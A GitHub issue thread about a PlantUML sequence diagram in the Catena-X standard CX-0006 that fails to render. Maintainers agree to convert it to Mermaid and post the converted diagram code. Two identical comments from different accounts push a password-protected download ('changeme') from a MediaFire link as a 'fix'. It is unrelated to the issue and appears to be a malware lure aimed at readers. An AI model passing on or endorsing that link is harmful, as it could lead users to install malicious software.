### ISSUE TITLE
Standard CX-0006 uses PlantUML, but it is not supported by the library.

### ISSUE THREAD

**Issue by ClosedSourcerer** [catenax-eV/catenax-ev.github.io#108]
https://catenax-ev.github.io/docs/next/standards/CX-0006-RegistrationAndInitialOnboarding#32-onboarding-to-catena-x-with-an-onboarding-service-provider

![image](https://github.com/user-attachments/assets/bc0ca9c2-5511-4863-9894-94938b245b69)

should most likely render as 

![image](https://github.com/user-attachments/assets/773fc538-b484-4700-b66e-651f3a31fefa)

but does not

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by stephanbcbauer** [comment]
@jSchuetz88 currently the PlantUML plug-in is not activated. That's why the Diagram is not shown as expected. Lets have a call to enable the PLug-In thx

**Comment by stephanbcbauer** [comment]
Its also related to this discussion https://github.com/catenax-eV/catenax-ev.github.io/discussions/114

Would like to activate PlantUML and Mermeid. @JSchuetz88 can we plan this for ths friday?

**Comment by werner-roman** [comment]
Hey @stephanbcbauer, @jSchuetz88,

I would propose to move to Mermaid for seq. Diagrams as we have support for it activated https://github.com/catenax-eV/catenax-ev.github.io/pull/115.
@jSchuetz88  - so just a short update of the standard?

PlantULM to Mermaid can be quite easily converted: e.g. [HERE](https://opoto.github.io/pu2mm/)

Mermaid for the seq. diagram would be:

```
sequenceDiagram

title Exemplary registration flow using a Onboarding Service Provider

"To be onboarded company" ->> "Onboarding Service Provider" : 1.) Register at Onboarding Service Provider
"To be onboarded company" ->> "Onboarding Service Provider" : 2.) Requests registration at Catena-X and agrees to submit data to the Core Service Provider
"Onboarding Service Provider" ->> "Core Service Provider" : 3.) POST registration/network/partnerRegistration
"Core Service Provider" ->> "To be onboarded company" : 4.) Email to confirm Terms & Conditions and finally submit the registration
"To be onboarded company" ->> "Core Service Provider" : 5.) Confirm Terms & Conditions and offically submit the registration request
"Core Service Provider" ->> "Onboarding Service Provider" : 6.) POST back registration status ("Submitted" or validation error")
"Core Service Provider" ->> "Core Service Provider" : 7.) Internal validation and processing of registration request
"Core Service Provider" ->> "Onboarding Service Provider" : 8.) POST back registration status ("Approved", "Decline", "Error")
"Core Service Provider" ->> "To be onboarded company" : 9.) Send back registration status ("Approved", "Decline", "Error") - including instructions how to access Catena-X

```

![image](https://github.com/user-attachments/assets/6ba52df6-26e0-4e85-9e6e-b40282d48308)

**Comment by stephanbcbauer** [comment]
Fine for me, I like plantUML more, cause it looks nicer :) but since we didn't activate plant UML... not sure if we are able to to it... let's go for mermaid

**Comment by jSchuetz88** [comment]
The PR is ready for review. For now I'd also like to stick with mermaid, but I don't see a general blocker against plantuml.
